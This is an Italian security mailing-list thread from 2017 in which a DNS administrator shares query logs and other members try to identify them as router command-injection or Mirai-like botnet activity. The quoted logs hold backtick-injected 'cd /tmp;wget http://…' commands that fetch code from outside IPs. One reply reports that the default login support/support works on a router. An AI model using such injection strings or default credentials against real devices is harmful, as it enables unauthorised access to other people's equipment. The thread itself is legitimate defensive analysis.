Sul primo router la login di default support/support sembra funzionare ;-) non ho provato le altre, ma se veramente indirizzasse router con credenziali di default attive, propenderei anche io a credere che si tratti di una botnet tipo Mirai, come ha già detto Guido Bolognesi.
Saluti 2017-02-15 8:34 GMT+01:00 [email protected] <[email protected]>: > Ho provato a seguire il link, dopo un redirect in javascript rimanda ad > una pagina di login che richiama la pagina di login di un router. > Strano. L'ip sembra sia in sud africa. > Io direi che è un tentativo di collezionare password di utenti ignari > che credono di accedere al loro router mentre stanno mandando le proprie > credenziali all'hacker di turno. > > > Il 14/02/2017 15:25, Lorenzo Mainardi ha scritto: > >> Buonasera a tutti, >> gestisco un server DNS cache per diverse migliaia di utenti broadband e >> mi ritrovo nei log delle query di questo tipo: >> >> 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? >> `cd /tmp;wget http://105.226.91.155. (53) >> 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? >> `cd /tmp;wget http://105.226.91.155. (53) >> 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? >> `cd /tmp;wget http://105.226.91.155. (53) >> 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd >> /tmp;wget http://36.107.97.237:. (53) >> 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? >> `cd /tmp;wget http://84.9.195.97:27. (53) >> 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? >> `cd /tmp;wget http://2.186.193.103:. (53) >> 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? >> `cd /tmp;wget http://2.186.193.103:. (53) >> 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? >> `cd /tmp;wget http://2.186.193.103:. (53) >> >> Che cosa pensate possano essere? Tentativi di command injection? >> è la prima volta che mi capita di vedere delle query del genere. >> >> -- >> LORENZO MAINARDI >> >> > > ________________________________________________________ > http://www.sikurezza.org - Italian Security Mailing List > > -- Marco Ermini CISSP, CISA, CISM, CEH, ITIL, PhD http://www.linkedin.com/in/marcoermini
